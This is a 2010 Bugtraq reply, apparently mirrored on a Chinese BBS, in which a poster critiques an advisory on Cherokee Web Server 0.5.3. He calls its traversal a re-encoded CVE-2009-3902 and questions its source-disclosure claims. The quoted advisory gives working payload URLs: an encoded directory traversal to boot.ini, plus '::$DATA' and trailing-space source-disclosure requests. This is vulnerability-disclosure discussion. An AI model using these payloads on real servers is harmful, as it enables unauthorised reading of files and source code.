Re: Cherokee Web Server 0.5.3 Multiple Vulnerabilities

看板Bugtraq作者jericho.時間15年前 (2010/07/03 02:01)推噓0(0推 0噓 0→)

留言0則, 0人參與討論串2/2 (看更多)

On Sat, 12 Jun 2010, info@securitylab.ir wrote: : ################################################################# : # Securitylab.ir : ################################################################# : # Application Info: : # Name: Cherokee Web Server : # Version: 0.5.3 : # Download: http://mirror.aarnet.edu.au/pub/cherokee/windows/Cherokee-setup-0.5.3.exe : ################################################################# : [Directory Traversal]: : http://127.0.0.1/%5C../%5C../%5C../boot.ini%20 This is essentially CVE-2009-3902, just encoding one char. : [Remote Source Disclosure]: : http://127.0.0.1:80/file.html::$DATA : : http://127.0.0.1/index.htm%20 Did you try these on something other than HTML? Did it work for .php or ..asp for example?

‣ 返回看板[ Bugtraq ] 臭蟲

‣ 更多 jericho. 的文章

文章代碼(AID): #1CBYbXUn (Bugtraq)